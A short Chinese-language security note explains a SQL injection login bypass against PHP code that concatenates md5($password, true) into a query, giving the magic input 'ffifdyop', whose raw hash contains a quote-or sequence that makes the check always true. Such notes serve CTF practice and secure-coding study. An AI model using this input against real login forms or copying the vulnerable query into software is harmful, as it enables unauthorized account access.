前提條件:php的md加密函數的第二個參數為ture
sql語句為:$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";
如果想達到萬能密碼的效果就要使語句變為:
$sql="select * from user where username ='admin' and password =''or'??'";
#其中??可為任意字符
注入方法是使md5($password,ture)的值為:’or'??
原本md5($password)的返回結果是16進制值是不可能的.只有第二個參數為true時可以反回的是字符
其中當$password=ffifdyop可得到想要的結果
所以當passsword=ffifdyop時可以登入